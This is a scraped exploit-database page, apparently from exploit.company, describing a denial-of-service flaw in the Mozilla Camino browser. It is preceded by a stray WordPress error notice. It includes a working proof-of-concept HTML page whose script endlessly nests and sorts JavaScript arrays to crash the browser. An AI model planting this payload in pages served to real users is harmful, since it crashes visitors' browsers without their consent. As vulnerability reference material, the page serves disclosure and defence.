Notice: Function _load_textdomain_just_in_time was called incorrectly. Translation loading for the wp-pagenavi domain was triggered too early. This is usually an indicator for some code in the plugin or theme running too early. Translations should be loaded at the init action or later. Please see Debugging in WordPress for more information. (This message was added in version 6.7.0.) in /home/u918112125/domains/exploit.company/public_html/wp-includes/functions.php on line 6114
Denial of Service in Mozilla Camino Web Browser - exploit.company
header-logo
Suggest Exploit
vendor:
Camino Web Browser
by:
Unknown
5.5
CVSS
MEDIUM
Browser Crash
CWE
Product Name: Camino Web Browser
Affected Version From: Unknown
Affected Version To: Unknown
Patch Exists: NO
Related CWE: Unknown
CPE: a:mozilla:camino
Metasploit:
Other Scripts:
Platforms Tested: Unknown
Unknown

Denial of Service in Mozilla Camino Web Browser

The vulnerability occurs when the browser performs an infinite JavaScript array sort operation, leading to a denial of service. It is currently believed that this vulnerability cannot be further exploited to execute arbitrary code, although this has not been confirmed.

Mitigation:

Unknown
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/11761/info

Mozilla Camino Web browser is prone to a vulnerability that may result in a browser crash. This issue is exposed when the browser performs an infinite JavaScript array sort operation. It is conjectured that this will only result in a denial of service and is not further exploitable to execute arbitrary code, though this has not been confirmed.

<HTML>
<SCRIPT> a = new Array(); while (1) { (a = new Array(a)).sort(); } </SCRIPT>
<SCRIPT> a = new Array(); while (1) { (a = new Array(a)).sort(); } </SCRIPT>
</HTML>